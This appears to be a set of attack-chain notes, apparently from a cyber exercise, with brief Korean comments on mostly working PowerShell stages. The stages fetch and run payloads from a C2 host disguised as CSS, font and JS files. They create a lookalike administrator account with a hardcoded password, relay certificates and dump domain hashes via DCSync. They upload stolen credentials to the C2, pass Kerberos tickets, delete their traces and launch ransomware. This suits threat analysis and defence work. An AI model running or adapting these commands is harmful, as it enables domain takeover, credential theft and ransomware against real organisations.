Document.doc 다운로드 및 실행
- LPE → Shellcode 인젝션 → admnistrator 계정 생성 및 관리자 그룹에 추가
profile.png 다운로드 및 실행
IEX (New-Object 'Net.Webclient')downloadstring.Invoke('<https://c2-conf.berylia.org/css/bxslider.min.css>');
Invoke-Runas -LogonType 2 -Binary 'cmd.exe' -Password 'Red.Alert.58!' -Args '/c =' -User 'admnistrator';
Start-Sleep -Seconds 5;IEX (New-Object 'Net.Webclient')downloadstring.Invoke('<https://c2-conf.berylia.org/media/mwfmdl2-v2.81.woff2>');
- Invoke-Runas 활용하여 앞에서 생성한 admnistrator 계정 권한으로 cmd 실행
- 추가 악성코드(mwfmdl2-v2.81.woff2) 다운로드 및 실행
mwfmdl2-v2.81.woff2
iwr -uri <https://c2-conf.berylia.org/js/chunk4867.min.js> -OutFile "C:\\Users\\Public\\Public Images\\sdiaghost.exe" -useb;
iwr -uri <https://c2-conf.berylia.org/js/sigma.js> -OutFile "C:\\Users\\Public\\Public Images\\tcbllaunch.exe" -useb;
iwr -uri <https://c2-conf.berylia.org/js/bootstrap.min.js> -OutFile "C:\\Users\\Public\\Public Images\\pcaiu.exe" -useb;
$domain = $env:USERDNSDOMAIN;
$parent_domain = ($domain -split "\\." | Select-Object -Skip 1) -join ".";
$parent_dc_fqdn = "dc01-conf." + $parent_domain;
$url = "<http://ca01-conf>." + $parent_domain + "/";
$dc_ip = "10." + $domain.Split(".")[4] + ".32.11";
$ws_ip = "10." + $domain.Split(".")[4] + ".32.14";
$hash_line = $null
do {
$command = ". 'C:\\Users\\Public\\Public Images\\sdiaghost.exe' relay -target $url -template DomainController -out 'C:\\Users\\Public\\Public Images\\dc01-conf'";
$encoded = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($command));
Start-Process -NoNewWindow -FilePath powershell.exe -ArgumentList "-e $encoded"
sleep 2;
for ($i = 0; $i -lt 10; $i++) {
. "C:\\Users\\Public\\Public Images\\tcbllaunch.exe" $dc_ip $ws_ip
sleep $i;
}
$hash_line = . "C:\\Users\\Public\\Public Images\\sdiaghost.exe" auth -pfx "C:\\Users\\Public\\Public Images\\dc01-conf.pfx" -dc-ip $dc_ip | Select-String "aad3b435b51404eeaad3b435b51404ee";
sleep 2;
} while ([string]::IsNullOrEmpty($hash_line))
$hash_line = $hash_line.Line.Split(":")[-1].trim();
. 'C:\\Users\\Public\\Public Images\\pcaiu.exe' asktgt /user:dc01-conf$ /domain:$parent_domain /rc4:$hash_line /ptt;
Get-ChildItem -Path "C:\\Users\\Public\\Public Images\\" | Remove-Item -Force;
Remove-Item -Path "C:\\Users\\Public\\Public Images\\" -Recurse -Force;
Invoke-Command -ComputerName $parent_dc_fqdn -ScriptBlock {IEX (New-Object Net.Webclient).downloadstring("<https://c2-conf.berylia.org/media/fa-solid-900.woff>")}
- dc의 Kerberos TGT 획득 및 추가 악성코드 설치
fa-solid-900.woff
mkdir "C:\\Users\\Public\\Public Images";
IEX (iwr '<https://c2-conf.berylia.org/css/style.css>');
Encrypt-Data;
iwr -uri <https://c2-conf.berylia.org/js/bootstrap.min.js> -OutFile "C:\\Users\\Public\\Public Images\\pcaiu.exe" -useb;
iwr -uri <https://c2-conf.berylia.org/css/onepick.css> -OutFile "C:\\Users\\Public\\Public Images\\wausevr.exe" -useb;
IEX (iwr '<https://c2-conf.berylia.org/css/bootstrap.min.css>');
$domain = $env:USERDNSDOMAIN;
$user = "administrator@" + $domain;
$ca = "ca01-conf." + $domain;
. 'C:\\Users\\Public\\Public Images\\wausevr.exe' "lsadump::dcsync /domain:$domain /all /csv" "exit" > "C:\\Users\\Public\\Public Images\\file.txt";
$filename = "credentials-" + $domain.Split(".")[3];
Upload-File -UploadUrl "<https://c2-conf.berylia.org/fileupload.php>" -FilePath "C:\\Users\\Public\\Public Images\\file.txt" -FileName $filename;
$hash_data = . 'C:\\Users\\Public\\Public Images\\wausevr.exe' "lsadump::dcsync /user:$user /domain:$domain" "exit" | sls "Hash NTLM" | Out-String;
$hash = $hash_data.Split(":")[1].trim();
. 'C:\\Users\\Public\\Public Images\\pcaiu.exe' asktgt /user:administrator /rc4:$hash /ptt;
Invoke-Command -ComputerName $ca -ScriptBlock {IEX (New-Object Net.Webclient).downloadstring("<https://c2-conf.berylia.org/media/goog-ads.jpg>")};
Remove-Item -Path "C:\\Users\\Public\\Public Images\\" -Recurse -Force;mm
- 랜섬웨어 다운로드 및 실행(header.png)
- 도메인 컨트롤러의 권한으로 Kerberos TGT 획득하고 ca에 goog-ads.jpg 설치